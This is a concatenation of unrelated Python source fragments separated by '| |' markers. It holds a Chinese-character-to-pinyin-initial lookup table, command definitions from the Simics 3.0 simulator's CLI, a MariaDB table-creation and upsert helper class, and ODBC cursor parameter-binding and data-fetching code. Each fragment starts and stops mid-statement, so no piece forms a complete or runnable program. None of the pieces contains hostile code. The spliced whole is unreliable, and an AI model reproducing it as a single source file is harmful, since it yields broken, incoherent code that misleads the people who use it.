u'烲' : [u'c'] ,
u'䍻' : [u'x'] ,
u'聽' : [u't'] ,
u'娄' : [u'l'] ,
u'皇' : [u'h', u'w'] ,
u'褎' : [u'y', u'x'] ,
u'钛' : [u't'] ,
u'㬚' : [u'c'] ,
u'䶡' : [u's', u'z'] ,
u'樤' : [u't'] ,
u'央' : [u'y'] ,
u'疱' : [u'p'] ,
u'蠸' : [u'q'] ,
u'䄾' : [u'r'] ,
u'鯅' : [u's', u't'] ,
u'㩄' : [u's'] ,
u'䳋' : [u'z', u't'] ,
u'楎' : [u'h'] ,
u'菕' : [u'l'] ,
u'塘' : [u't'] ,
u'瓛' : [u'h'] ,
u'轢' : [u'l'] ,
u'䁨' : [u'h'] ,
u'髯' : [u'r'] ,
u'㥮' : [u'z'] ,
u'叵' : [u'p'] ,
u'桸' : [u'x'] ,
u'苿' : [u'w'] ,
u'徂' : [u'c'] ,
u'焉' : [u'y'] ,
u'躌' : [u'w'] ,
u'䞒' : [u'd'] ,
u'㢘' : [u'l'] ,
u'霝' : [u'l'] ,
u'䠣' : [u'x'] ,
u'澢' : [u'd'] ,
u'庬' : [u'p', u'm'] ,
u'瀳' : [u'j'] ,
u'趶' : [u'k'] ,
u'䚼' : [u'n'] ,
u'陇' : [u'l'] ,
u'位' : [u'w'] ,
u'滌' : [u'd'] ,
u'巖' : [u'y'] ,
u'睝' : [u'l'] ,
u'賠' : [u'p'] ,
u'㻬' : [u't'] ,
u'镱' : [u'y'] ,
u'乷' : [u's'] ,
u'淶' : [u'l'] ,
u'崀' : [u'l'] ,
u'禃' : [u'z'] ,
u'鸂' : [u'q', u'x'] ,
u'憓' : [u'h'] ,
u'龗' : [u'l'] ,
u'洠' : [u'm'] ,
u'䪥' : [u'x', u'd'] ,
u'嘲' : [u'c', u'z'] ,
u'犵' : [u'q', u'h', u'j', u'g'] ,
u'錴' : [u'l'] ,
u'㵀' : [u'c', u'z'] ,
u'繂' : [u's'] ,
u'埇' : [u'y'] ,
u'郉' : [u'x'] ,
u'晒' : [u's'] ,
u'翗' : [u'q'] ,
u'鱖' : [u'j', u'g'] ,
u'䭤' : [u'q'] ,
u'柧' : [u'g'] ,
u'葦' : [u'w'] ,
u'鷫' : [u's'] ,
u'㙲' : [u'y'] ,
u'獴' : [u'm'] ,
u'䣹' : [u'f'] ,
u'藻' : [u'z'] ,
u'咆' : [u'p'] ,
u'醈' : [u't'] ,
u'渍' : [u'z'] ,
u'粖' : [u'm'] ,
u'匟' : [u'k'] ,
u'谡' : [u's'] ,
u'撦' : [u'c'] ,
u'笯' : [u'n'] ,
u'誺' : [u'c'] ,
u'挿' : [u'c', u'z'] ,
u'屁' : [u'p'] ,
u'饃' : [u'm'] ,
u'燈' : [u'd'] ,
u'䑑' : [u'p'] ,
u'腓' : [u'f'] ,
u'嫚' : [u'm'] ,
u'韜' : [u't'] ,
u'污' : [u'y', u'w'] ,
u'关' : [u'w', u'g'] ,
u'鉵' : [u't'] ,
u'櫺' : [u'l'] ,
u'㦅' : [u'd'] ,
u'霆' : [u't'] ,
u'䰌' : [u'z'] ,
u'梏' : [u'j', u'g'] ,
u'宙' : [u'z'] ,
u'琜' : [u'l'] ,
u'誣' : [u'w'] ,
u'㢯' : [u'm'] ,
u'阰' : [u'p'] ,
u'伶' : [u'l'] ,
u'殹' : [u'y'] ,
u'嫃' : [u'z'] ,
u'睆' : [u'h'] ,
u'跍' : [u'k'] ,
u'䋓' : [u'z'] ,
u'㯙' : [u'c'] ,
u'饚' : [u'h'] ,
u'习' : [u'x'] ,
u'櫣' : [u'l'] ,
u'腪' : [u'y'] ,
u'癰' : [u'y'] ,
u'賷' : [u'q', u'j'] ,
u'䗽' : [u'w'] ,
u'缁' : [u'z'] ,
u'预' : [u'y'] ,
u'冊' : [u'c'] ,
u'肔' : [u'y'] ,
u'嘛' : [u'm'] ,
u'禚' : [u'z'] ,
u'褥' : [u'r', u'n'] ,
u'縫' : [u'f'] ,
u'憪' : [u'x'] ,
u'鮮' : [u'x'] ,
u'㜱' : [u'z', u'd'] ,
u'傴' : [u'y'] ,
u'昻' : [u'a'] ,
u'莾' : [u'm'] ,
u'奅' : [u'p'] ,
u'磄' : [u't'] ,
u'衏' : [u'y'] ,
u'惔' : [u't', u'd'] ,
u'高' : [u'g'] ,
u'㙛' : [u'b'] ,
u'叞' : [u'w'] ,
u'楥' : [u'y', u'x'] ,
u'苨' : [u'n'] ,
u'塯' : [u'l'] ,
u'篮' : [u'l'] ,
u'譹' : [u'h', u'x'] ,
u'䁿' : [u'm'] ,
u'揾' : [u'w'] ,
u'匈' : [u'x'] ,
u'澋' : [u'h', u'j'] ,
u'逊' : [u'x'] ,
u'笘' : [u's'] ,
u'咝' : [u's'] ,
u'醟' : [u'y'] ,
u'挨' : [u'a'] ,
u'鴬' : [u'y'] ,
u'撽' : [u'q'] ,
u'蔼' : [u'a'] ,
u'黁' : [u'n'] ,
u'灊' : [u'q'] ,
u'蛑' : [u'm'] ,
u'㓝' : [u'x'] ,
u'啜' : [u'c'] ,
u'營' : [u'y', u'c'] ,
u'鉞' : [u'y', u'h'] ,
u'絬' : [u'x'] ,
u'囱' : [u'c'] ,
u'鏳' : [u'z'] ,
u'敼' : [u'x'] ,
u'龀' : [u'c'] ,
u'㬃' : [u't'] ,
u'砅' : [u'l'] ,
u'螐' : [u'w'] ,
u'怕' : [u'p'] ,
u'崗' : [u'g'] ,
u'騙' : [u'p'] ,
u'䔧' : [u'l'] ,
u'舩' : [u'c'] ,
u'钲' : [u'z'] ,
u'洷' : [u'z'] ,
u'翀' : [u'c'] ,
u'剉' : [u'c'] ,
u'轋' : [u'h'] ,
u'某' : [u'm'] ,
u'㵗' : [u'p', u'f'] ,
u'穙' : [u'p'] ,
u'䳢' : [u'q'] ,
u'觤' : [u'g'] ,
u'扩' : [u'k'] ,
u'彫' : [u'd'] ,
u'鱭' : [u'j'] ,
u'㟰' : [u'm'] ,
u'葽' : [u'y'] ,
u'膁' : [u'q', u'l'] ,
u'昄' : [u'b'] ,
u'䪇' : [u'b'] ,
u'馑' : [u'j'] ,
u'縔' : [u's'] ,
u'贞' : [u'z'] ,
u'熡' : [u'l'] ,
u'嘤' : [u'y'] ,
u'肫' : [u'c', u'z', u't'] ,
u'攮' : [u'n'] ,
u'䦱' : [u'k', u'w'] ,
u'颻' : [u'y'] ,
u'紾' : [u'z', u't'] ,
u'豈' : [u'q', u'k'] ,
u'烋' : [u'x'] ,
u'啎' : [u'w'] ,
u'㧑' : [u'w'] ,
u'摘' : [u'z'] ,
u'韥' : [u'd'] ,
u'籨' : [u'l'] ,
u'譲' : [u'r'] ,
u'呸' : [u'p'] ,
u'㣻' : [u'y'] ,
u'萃' : [u'c'] ,
u'掂' : [u'd'] ,
u'䴉' : [u'x'] ,
u'鰓' : [u'x', u's'] ,
u'箒' : [u'z'] ,
u'誜' : [u's'] ,
u'琣' : [u'p'] ,
u'厢' : [u'x'] ,
u'茭' : [u'q', u'x', u'j'] ,
u'抬' : [u't'] ,
u'鬽' : [u'm'] ,
u'窼' : [u'c', u'z'] ,
u'视' : [u's'] ,
u'獍' : [u'j'] ,
u'勌' : [u'j'] ,
u'艗' : [u'y'] ,
u'懖' : [u'g'] ,
u'䭝' : [u'k'] ,
u'驧' : [u'j'] ,
u'秦' : [u'q'] ,
u'裰' : [u'd'] ,
u'牷' : [u'q'] ,
u'凶' : [u'x'] ,
u'㭽' : [u'd'] ,
u'愀' : [u'q'] ,
u'䖃' : [u'y'] ,
u'蚅' : [u'e'] ,
u'礐' : [u'q'] ,
u'嶓' : [u'b'] ,
u'麕' : [u'q', u'j'] ,
u'儠' : [u'l'] ,
u'㖣' : [u't'] ,
u'鈢' : [u'n'] ,
u'皥' : [u'h'] ,
u'樲' : [u'e'] ,
u'亵' : [u'x'] ,
u'鎷' : [u'm'] ,
u'䉂' : [u'l'] ,
u'蝄' : [u'w'] ,
u'毇' : | |
process itself, useful for
various things (such as attaching a remote debugger).""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1894")
#
# -------------------- readme --------------------
#
def readme_cmd():
print SIM_readme()
new_command("readme", readme_cmd,
[],
type = ["Help"],
short = "print information about Simics",
doc = """
Prints various useful information (README) about Simics.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1909")
#
# -------------------- license --------------------
#
def license_cmd():
SIM_license()
new_command("license", license_cmd,
[],
type = ["Help"],
short = "print simics license",
doc = """
Prints the LICENSE that applies to this copy of Simics.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1923")
#
# -------------------- copyright --------------------
#
def copyright_cmd():
SIM_copyright()
new_command("copyright", copyright_cmd,
[],
type = ["Help"],
short = "print full Simics copyright information",
doc = """
Prints the complete copyright information that applies to this copy of Simics.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1937")
#
# -------------------- version --------------------
#
def version_cmd(verbose):
if verbose:
print "%s (%s)\n" % (SIM_version(), SIM_snapshot_date())
print "build-id: %d" % conf.sim.version
print SIM_version_sub()
else:
print SIM_version()
print
new_command("version", version_cmd,
[arg(flag_t, "-v")],
type = ["Help"],
short = "display Simics version",
doc = """
Prints the Simics version. With the <tt>-v</tt> flag, compiler version
and compile dates are printed as well.
""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1957");
#
# -------------------- quiet --------------------
#
quiet_mode = 0
def quiet_cmd(mode):
global quiet_mode
if mode not in [-1,0,1]:
print "Illegal mode"
return
if mode == -1:
quiet_mode = 1 - quiet_mode
else:
quiet_mode = mode
SIM_set_quiet(quiet_mode)
if quiet_mode:
print "[simics] Switching on quiet mode."
else:
print "[simics] Switching off quiet mode."
new_command("quiet", quiet_cmd,
[arg(int_t, "mode", "?", -1)],
type = "internal commands",
short = "toggle quiet mode",
doc = """
Switches quiet mode to given value.
Sets Simics to 'quiet' mode if the value is 1, or turns off
quiet mode if the value is 0, or toggles if the value is -1.
See also the 'verbose' command. Default is to toggle.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1990")
#
# -------------------- verbose --------------------
#
verbose_mode = 0
def verbose_cmd(mode):
global verbose_mode
if mode not in [-1,0,1]:
print "Illegal mode"
return
if mode == -1:
verbose_mode = 1 - verbose_mode
else:
verbose_mode = mode
SIM_set_verbose(verbose_mode)
if verbose_mode:
print "[simics] Switching on verbose mode."
else:
print "[simics] Switching off verbose mode."
new_command("verbose", verbose_cmd,
[arg(int_t, "mode", "?", -1)],
type = "internal commands",
short = "toggle verbose mode",
doc = """
Switches verbose mode to given value.
Sets Simics to 'verbose' mode if the value is 1, or turns off
verbose mode if the value is 0, or toggles if the value is -1.
See also the 'quiet' command. Default is to toggle.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2024")
#
# -------------------- = --------------------
#
def assignment_command(name, value):
if name[0] == '%':
if not value[0] == int_t:
print "Value is not an integer."
SIM_command_has_problem()
return
(cpu, _) = get_cpu()
return obj_write_reg_cmd(cpu, name[1:], cast(uint64_t, value[1]))
elif name.startswith('$$'):
name = name[2:]
local = 1
elif name[0] == '$':
name = name[1:]
local = 0
else:
local = 0
print ('Deprecation warning: variable assignment without variable '
'prefix $.')
if conf.prefs.fail_on_warnings:
SIM_quit(1)
get_current_locals().set_variable_value(name, value[1], local)
# do not return anything (avoid execution of string assignments)
new_command("=", assignment_command,
[arg(str_t, doc = "name"),
arg((int_t, str_t, float_t),
("ival", "sval", "fval"), doc = "value")],
type = ["Command-Line Interface"],
short = "set an environment variable",
pri = -100,
infix = 1,
doc = """
Set a Simics environment variable to an integer or string value.
Or assigns a value to a processor register.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2061")
#
# -------------------- [ --------------------
#
def array_command(name, idx, rw, value):
if name[0] != '$':
print "Indexing only supported for variables"
SIM_command_has_problem()
return
if name.startswith('$$'):
name = name[2:]
local = 1
else:
name = name[1:]
local = 0
space = get_current_locals()
if rw[2] == '-r':
try:
return getattr(space, name)[idx]
except Exception, msg:
return
else:
try:
space.set_variable_value_idx(name, value[1], local, idx)
except:
print "Failed setting variable."
SIM_command_has_problem()
return
new_command("[", array_command,
[arg(str_t, "variable"),
arg(int_t, "idx"),
arg((flag_t, flag_t), ('-r', '-w')),
arg((int_t, str_t), ('ival', 'sval'), doc = 'value')],
type = ["Command-Line Interface"],
short = "",
pri = 750,
infix = 1,
doc = """
""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2103")
#
# -------------------- unset --------------------
#
def unset_command(all, names):
if all:
rlist = [x for x in get_current_locals().get_all_variables().keys()
if x not in names]
else:
rlist = names
for n in rlist:
try:
get_current_locals().remove_variable(n)
except:
print 'Unset failed for $%s.' % n
new_command("unset", unset_command,
[arg(flag_t, "-a"),
arg(str_t, "variables", "*")],
type = ["Command-Line Interface"],
short = "remove a environment variable",
doc = """
Removes (unsets) a Simics environment variable. The <arg>-a</arg> flag causes
all variables to be removed, <em>except</em> the ones specified as
<arg>variables</arg>.
""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2132")
#
# -------------------- += --------------------
#
def inc_environment_variable(name, value):
if name[0] == '%':
if not value[0] == int_t:
print "Value is not an integer."
SIM_command_has_problem()
return
(cpu, _) = get_cpu()
value = cast(uint64_t, obj_read_reg_cmd(cpu, name[1:]) + value[1])
return obj_write_reg_cmd(cpu, name[1:], value)
elif name[0] == '$':
name = name[1:]
else:
print 'Deprecation warning: variable assignment without variable prefix $.'
if conf.prefs.fail_on_warnings:
SIM_quit(1)
space = get_current_locals()
if space.get_all_variables().has_key(name):
old = getattr(space, name)
if isinstance(old, str):
old = (str_t, old)
else:
old = (int_t, old)
else:
if value[0] == int_t:
old = (value[0], 0)
else:
old = (str_t, '')
setattr(space, name, plus(old, value))
return getattr(space, name)
new_command("+=", inc_environment_variable,
[arg(str_t, doc = "name"),
arg((int_t, str_t), ("ival", "sval"), doc = "value")],
type = ["Command-Line Interface"],
short = "set an environment variable",
pri = -100,
infix = 1,
doc = """
Add a string or integer to a Simics environment variable, or an integer
value to a register.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2178")
#
# -------------------- -= --------------------
#
def dec_environment_variable(name, value):
if name[0] == '%':
(cpu, _) = get_cpu()
value = cast(uint64_t, obj_read_reg_cmd(cpu, name[1:]) - value)
return obj_write_reg_cmd(cpu, name[1:], value)
elif name[0] == '$':
name = name[1:]
else:
print 'Deprecation warning: variable assignment without variable prefix $.'
if conf.prefs.fail_on_warnings:
SIM_quit(1)
space = get_current_locals()
if space.get_all_variables().has_key(name):
old = getattr(space, name)
if not isinstance(old, (int, long)):
print "Variable is not an integer."
SIM_command_has_problem()
return
else:
old = 0
setattr(space, name, minus(old, value))
return getattr(space, name)
new_command("-=", dec_environment_variable,
[arg(str_t, doc = "name"),
arg(int_t, "value")],
type = ["Command-Line Interface"],
short = "set an environment variable",
pri = -100,
infix = 1,
doc = """
Subtract an integer from a Simics environment variable, or from a
register.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2218")
#
# -------------------- $ --------------------
#
def environment_var_expander(comp):
return get_completions(comp,
get_current_locals().get_all_variables().keys())
def get_environment_variable(name):
return getattr(get_current_locals(), name)
new_command("$", get_environment_variable,
[arg(str_t, "name", expander = environment_var_expander)],
type = ["Command-Line Interface"],
short = "get the value of an environment variable",
pri = 2000,
check_args = 0,
doc = """
Gets the value of a Simics environment variable, like in <tt>print $var</tt>.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2240")
#
# -------------------- list-vars --------------------
#
def list_vars_cmd():
l = []
m = 0
d = get_current_locals().get_all_variables()
for k in d.keys():
l.append((k,d[k]))
m = max(m, len(k))
l.sort()
for v in l:
print "%-*s =" % (m, v[0]), v[1]
new_command("list-vars", list_vars_cmd,
[],
type = ["Command-Line Interface"],
short = "list environment variables",
doc = """
Lists all Simics environment variables and their current
values. Environment variables can be used to store temporary
values. To set a variable, write <tt>variable = value</tt> at the
Simics prompt. The value can be of type integer, string, or float. To
access a variable, prefix the name with a <tt>$</tt>, e.g.,
<tt>$variable</tt>. A variable can be put wherever an expression can be
used. For example:
<tt>simics> tmp = %pc + 4</tt><br/>
<tt>simics> count = 10</tt><br/>
<tt>simics> disassemble $tmp $count</tt><br/>
They can also be accessed from Python by using the name space simenv:
<tt>simics> $foo = 1 + 4 * 4</tt><br/>
<tt>simics> @print simenv.foo</tt><br/>
<tt>17</tt><br/>
<tt>simics> @simenv.bar = "hello"</tt><br/>
<tt>simics> echo $bar</tt><br/>
<tt>hello</tt>
""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2265")
#
# -------------------- list-namespaces --------------------
#
def list_namespaces_cmd(name_sort):
l = []
i = []
m = 0
# Fins all interfaces used as command namespaces
iface_namespaces = []
for cmd in simics_commands():
iface = cmd["namespace"]
if iface:
try:
if SIM_get_class(iface) == iface:
iface = None
except SimExc_General:
pass
if iface and not iface in iface_namespaces:
iface_namespaces.append(iface)
for o in SIM_get_all_objects():
namespace = o.name
classname = o.classname
l = l + [ [ "<" + classname + ">", namespace ] ]
for iface in iface_namespaces:
if instance_of(o, iface):
i = i + [ [ "<" + iface + ">", namespace ] ]
if name_sort:
l.sort(lambda a, b: cmp(a[1], b[1]))
i.sort(lambda a, b: cmp(a[1], b[1]))
else:
l.sort()
i.sort()
print_columns([ Just_Left, Just_Left ],
[ [ "Class", "Namespace (Object)" ] ] + l)
print ""
print_columns([ Just_Left, Just_Left ],
[ [ "Interface", "Namespace (Object)" ] ] + i)
new_command("list-namespaces", list_namespaces_cmd,
[arg(flag_t, "-n")],
type = ["Command-Line Interface", "Help"],
short | |
given fields
#
# Maybe set the field's values as defaults.
#
# Set as primary key the index_column (if given); this will
# normally be the RunID and there is a limitation in that it
# can't be an unlimited length SQL type; hence we set it in
# self.sql_types_by_field to be a vachar(255) (if anyone sets
# a RunID longer than 255, ... their problem. FIXME: needs
# runtime verification)
#
# The SQL command is basically
#
# create table TABLENAME (
# FIELD1 TYPE1 [default DEFAULT1],
# FIELD2 TYPE2 [default DEFAULT2],
# ...,
# [primary key ( FIELDx );
#
if defaults:
cmd = f"create table if not exists `{table_name}` ( " \
+ ", ".join(
f"`{field}` {self.sql_type(field, value)} default ?"
for field, value in fields.items()
) \
+ ( f", primary key (`{index_column}`)" if index_column else "" ) \
+ " );"
values = tuple(self.defaults_map.get(column, None)
for column in fields)
cursor.execute(cmd, values)
else:
cmd = f"create table if not exists `{table_name}` ( " \
+ ", ".join(
f"`{field}` {self.sql_type(field, value)}"
for field, value in fields.items()
) \
+ (
f", primary key (`{index_column}`)"
if index_column else ""
) \
+ " );"
cursor.execute(cmd)
def _table_columns_update(self, cursor, table_name,
defaults = False, **fields):
# Add missing columns to a table, maybe setting defaults
#
# First list the current columns
cmd = \
f"select column_name" \
f" from information_schema.columns" \
f" where table_name = '{table_name}'"
cursor.execute(cmd)
columns = set(row[0] for row in cursor)
fields_wanted = fields.keys()
columns_missing = fields_wanted - columns
if not columns_missing:
return
# add new missing new columns
if defaults:
cmd = \
f"alter table `{table_name}` add ( " \
+ f", ".join(
f" `{column}` {self.sql_type(column, fields[column])}"
f" default {self.defaults_map.get(column, None)} "
for column in columns_missing
) + f" );"
else:
cmd = \
f"alter table `{table_name}` add ( " \
+ f", ".join(
f" `{column}` {self.sql_type(column, fields[column])}"
for column in columns_missing
) + " );"
cursor.execute(cmd)
def _table_row_insert(self, cursor, table_name, **fields):
# insert all the values in the specific columns
#
## insert into TABLENAME ( FIELD1, FIELD2...) data ( VALUE1, VALUE2...)
#
# note we use %s placeholders for the values, to let the
# python itnerface type them properly and pass execute() a
# tuple with the values
cmd = \
f"insert into `{table_name}` ( " \
" `" + "`, `".join(fields.keys()) + "` )" \
" values ( " + " , ".join("?" for _ in fields.values()) + " );"
cursor.execute(cmd, tuple(fields.values()))
@functools.lru_cache(maxsize = 2048)
def _id_maybe_encode_cache(self, _tls, _made_in_pid, identifier, max_len):
"""
If an identifier is longer than the maximum, convert it and
register it.
Register it in the *Field IDs* table so we can later refer to
it as needed.
:param str identifier: identifier to check and maybe convert
:return str: identifier if (shorter than :data:`id_max_len`)
or the encoded name if it was longer.
"""
if len(identifier) >= max_len:
fieldid = commonl.mkid(identifier, 10)
self.table_row_update("Field IDs", "FieldID", fieldid,
**{ "Field Name": identifier })
return "fieldid:" + fieldid
return self._sql_id_esc(identifier)
def _id_maybe_encode(self, identifier, max_len = 32):
return self._id_maybe_encode_cache(
threading.get_ident(), os.getpid(),
identifier, max_len)
def _table_name_prepare(self, table_name, prefix_bare):
prefix_esc = self.table_name_prefix + self._sql_id_esc(prefix_bare)
prefix_len = len(self.table_name_prefix_raw) + len(prefix_bare)
_table_name = prefix_esc + self._id_maybe_encode(table_name, 64 - prefix_len)
return _table_name.strip() # table names can't start/end w space
def table_row_update(self, table_name, index_column, index_value,
prefix_bare = "", **fields):
# insert/update fields in a table
#
# Use the index value of the index column to find the row to
# update or insert a new one if not present.
#
# If the table does not exist, create it; if any column is
# missing, add them.
_table_name = self._table_name_prepare(table_name, prefix_bare)
connection = self._connection_get()
with connection.cursor() as cursor:
while True:
# Now try to insert the row
#
# - if the primary key is duplicated, update the
# values
#
# Seriously this SQL thing...
#
# insert into TABLENAME (
# INDEX_COLUMN, FIELD1, FIELD2 ...)
# values ( INDEX_VALUE, VALUE1, VALUE2 ... )
# on duplicate key update
# FIELD1 = value(FIELD1),
# FIELD2 = value(FIELD2),
# ...;
#
# If there is no row with INDEX_COLUMN with
# INDEX_VALUE, insert it with those FIELDs,
# otherwise, update it. Clear as mud--especially the
# code.
#
# Thanks https://stackoverflow.com/a/41894298
#
# - if we get errors because the table or columns
# still do not exist, fix'em and
# try again
try:
cmd = \
f"insert into `{_table_name}` (`{index_column}`, " \
+ ", ".join(
f"`{self._sql_id_esc(column)}`"
for column in fields
) \
+ " ) values ( ?, " + ", ".join(
"?"
for column in fields
) + " ) on duplicate key update " \
+ ", ".join(
f"`{self._sql_id_esc(column)}` = values(`{self._sql_id_esc(column)}`)"
for column in fields
) + ";"
values = ( index_value, ) + tuple(fields.values())
cursor.execute(cmd, values)
# In theory python MariaDB does autocommit, but I
# guess not?
connection.commit()
break # success, get out of the retry loop
except mariadb.ProgrammingError as e:
# if the database doesn't exist, the error will read
#
## mariadb.ProgrammingError: Table 'DBNAME.TABLENAME table' doesn't exist
#
# if there is a better way, I am all ears
if not str(e).endswith(f"Table '{self.database}.{_table_name}' doesn't exist"):
raise
# ops, the table does not exist, create it with
# these fields; guess the types from the field
# values and retry; but we want to have FIRST the
# index column -- we rely on python3 keeping
# insertion order for dictionaries
f = { index_column: index_value }
f.update(fields)
try:
self._table_create(cursor, _table_name,
defaults = True,
index_column = index_column,
**f)
connection.commit()
except mariadb.OperationalError as e:
if str(e).endswith(f"Table '{_table_name}' already exists"):
# someone did it already, retry
continue
raise
continue # now try to insert/update again
except mariadb.OperationalError as e:
# If any column does not exist, we'll get
#
## mariadb.OperationalError: Unknown column ...blablah
#
# if there is a better way, I am all ears
if not str(e).startswith("Unknown column"):
raise
self._table_columns_update(cursor, _table_name, **fields)
f = { index_column: index_value }
f.update(fields)
continue
def table_row_inc(self, table_name, index_column, index_value,
prefix_bare = "", **fields):
# Increment by one the listed fileds in the row matching
# index_value
#
# If the row does not exist, add it with the given fields set
# to one.
_table_name = self._table_name_prepare(table_name, prefix_bare)
connection = self._connection_get()
with connection.cursor() as cursor:
while True:
# Now try to inser the row; if we get errors because
# the table or columns still do not exist, fix'em and
# try again
try:
f = list(fields.keys())
f.remove(index_column) # no need to increase this field
# increase by one values of the specified columns in the row
# whose primary key (index_column) has the given index_value
#
## insert into TABLENAME (INDEX_COLUMN, FIELD1, FIELD2...)
## values (INDEX_VALUE, 1, 1, ...)
## on duplicate key update
## FIELD1 = value(FIELD1) + 1,
## FIELD2 = value(FIELD2) + 1,
## ...;
#
# note we use %s placeholders for the values, to let the
# python itnerface type them properly and pass execute() a
# tuple with the values
cmd = \
f"insert into `{_table_name}` (`{index_column}`, " \
+ ", ".join(f"`{column}`" for column in f) \
+ " ) values ( ?" + ", 1" * len(f) \
+ " ) on duplicate key update " \
+ ", ".join(
f"`{column}` = `{column}` + 1"
for column in f
) + ";"
cursor.execute(cmd, (index_value, ))
# In theory python MariaDB does autocommit, but I
# guess not?
connection.commit()
break # success, get out of the retry loop
except mariadb.ProgrammingError as e:
# if the database doesn't exist, the error will read
#
## mariadb.ProgrammingError: Table 'DBNAME.TABLENAME table' doesn't exist
#
# if there is a better way, I am all ears
if not str(e).endswith(f"Table '{self.database}.{_table_name}' doesn't exist"):
raise
# ops, the | |
print 'conx.type_size_dic.has_key(SQL_TYPE_DATE)'
sql_type = SQL_TYPE_DATE
buf_size = self.connection.type_size_dic[SQL_TYPE_DATE][0]
ParameterBuffer = create_buffer(buf_size)
col_size = self.connection.type_size_dic[SQL_TYPE_DATE][1]
else:
# SQL Sever <2008 doesn't have a DATE type.
sql_type = SQL_TYPE_TIMESTAMP
buf_size = 10
ParameterBuffer = create_buffer(buf_size)
elif issubclass(param_types[col_num], datetime.time):
sql_c_type = SQL_C_CHAR
if self.connection.type_size_dic.has_key(SQL_TYPE_TIME):
sql_type = SQL_TYPE_TIME
buf_size = self.connection.type_size_dic[SQL_TYPE_TIME][0]
ParameterBuffer = create_buffer(buf_size)
col_size = self.connection.type_size_dic[SQL_TYPE_TIME][1]
elif self.connection.type_size_dic.has_key(SQL_SS_TIME2):
# TIME type added in SQL Server 2008
sql_type = SQL_SS_TIME2
buf_size = self.connection.type_size_dic[SQL_SS_TIME2][0]
ParameterBuffer = create_buffer(buf_size)
col_size = self.connection.type_size_dic[SQL_SS_TIME2][1]
else:
# SQL Sever <2008 doesn't have a TIME type.
sql_type = SQL_TYPE_TIMESTAMP
buf_size = self.connection.type_size_dic[SQL_TYPE_TIMESTAMP][0]
ParameterBuffer = create_buffer(buf_size)
col_size = 3
elif issubclass(param_types[col_num], unicode):
sql_c_type = SQL_C_WCHAR
sql_type = SQL_WVARCHAR
buf_size = 255
ParameterBuffer = create_buffer_u(buf_size)
elif issubclass(param_types[col_num], str):
sql_c_type = SQL_C_CHAR
sql_type = SQL_VARCHAR
buf_size = 255
ParameterBuffer = create_buffer(buf_size)
elif issubclass(param_types[col_num], (bytearray, buffer)):
sql_c_type = SQL_C_BINARY
sql_type = SQL_LONGVARBINARY
buf_size = len(self._inputsizers)>col_num and self._inputsizers[col_num] or 20500
ParameterBuffer = create_buffer(buf_size)
else:
sql_c_type = SQL_C_CHAR
sql_type = SQL_LONGVARCHAR
buf_size = len(self._inputsizers)>col_num and self._inputsizers[col_num] or 20500
ParameterBuffer = create_buffer(buf_size)
temp_holder.append((sql_c_type, sql_type, buf_size, col_size, ParameterBuffer))
for col_num, (sql_c_type, sql_type, buf_size, col_size, ParameterBuffer) in enumerate(temp_holder):
BufferLen = ctypes.c_ssize_t(buf_size)
LenOrIndBuf = ctypes.c_ssize_t()
InputOutputType = SQL_PARAM_INPUT
if len(pram_io_list) > col_num:
InputOutputType = pram_io_list[col_num]
ret = SQLBindParameter(self._stmt_h, col_num + 1, InputOutputType, sql_c_type, sql_type, buf_size,\
col_size, ADDR(ParameterBuffer), BufferLen,ADDR(LenOrIndBuf))
if ret != SQL_SUCCESS:
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
# Append the value buffer and the lenth buffer to the array
ParamBufferList.append((ParameterBuffer,LenOrIndBuf,sql_type))
self._last_param_types = param_types
self._ParamBufferList = ParamBufferList
def _CreateColBuf(self):
NOC = self._NumOfCols()
self._ColBufferList = []
self._row_type = None
for col_num in range(NOC):
col_name = self.description[col_num][0]
col_sql_data_type = self._ColTypeCodeList[col_num]
# set default size base on the column's sql data type
total_buf_len = SQL_data_type_dict[col_sql_data_type][4]
# over-write if there's preset size value for "large columns"
if total_buf_len >= 20500:
total_buf_len = self._outputsize.get(None,total_buf_len)
# over-write if there's preset size value for the "col_num" column
total_buf_len = self._outputsize.get(col_num, total_buf_len)
alloc_buffer = SQL_data_type_dict[col_sql_data_type][3](total_buf_len)
used_buf_len = ctypes.c_ssize_t()
target_type = SQL_data_type_dict[col_sql_data_type][2]
force_unicode = self.connection.unicode_results
if force_unicode and col_sql_data_type in (SQL_CHAR,SQL_VARCHAR,SQL_LONGVARCHAR):
target_type = SQL_C_WCHAR
alloc_buffer = create_buffer_u(total_buf_len)
buf_cvt_func = self.connection.output_converter[self._ColTypeCodeList[col_num]]
self._ColBufferList.append([col_name, target_type, used_buf_len, alloc_buffer, total_buf_len, buf_cvt_func])
def _GetData(self):
'''Bind buffers for the record set columns'''
# Lazily create the row type on first fetch.
if self._row_type is None:
self._row_type = self.row_type_callable(self)
value_list = []
col_num = 0
for col_name, target_type, used_buf_len, alloc_buffer, total_buf_len, buf_cvt_func in self._ColBufferList:
blocks = []
while True:
ret = ODBC_API.SQLGetData(self._stmt_h, col_num + 1, target_type, ADDR(alloc_buffer), total_buf_len,\
ADDR(used_buf_len))
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
if ret == SQL_SUCCESS:
if used_buf_len.value == SQL_NULL_DATA:
blocks.append(None)
else:
if target_type == SQL_C_BINARY:
blocks.append(alloc_buffer.raw[:used_buf_len.value])
elif target_type == SQL_C_WCHAR:
blocks.append(from_buffer_u(alloc_buffer))
else:
#print col_name, target_type, alloc_buffer.value
blocks.append(alloc_buffer.value)
break
if ret == SQL_SUCCESS_WITH_INFO:
if target_type == SQL_C_BINARY:
blocks.append(alloc_buffer.raw)
else:
blocks.append(alloc_buffer.value)
if ret == SQL_NO_DATA:
break
if len(blocks) == 1:
raw_value = blocks[0]
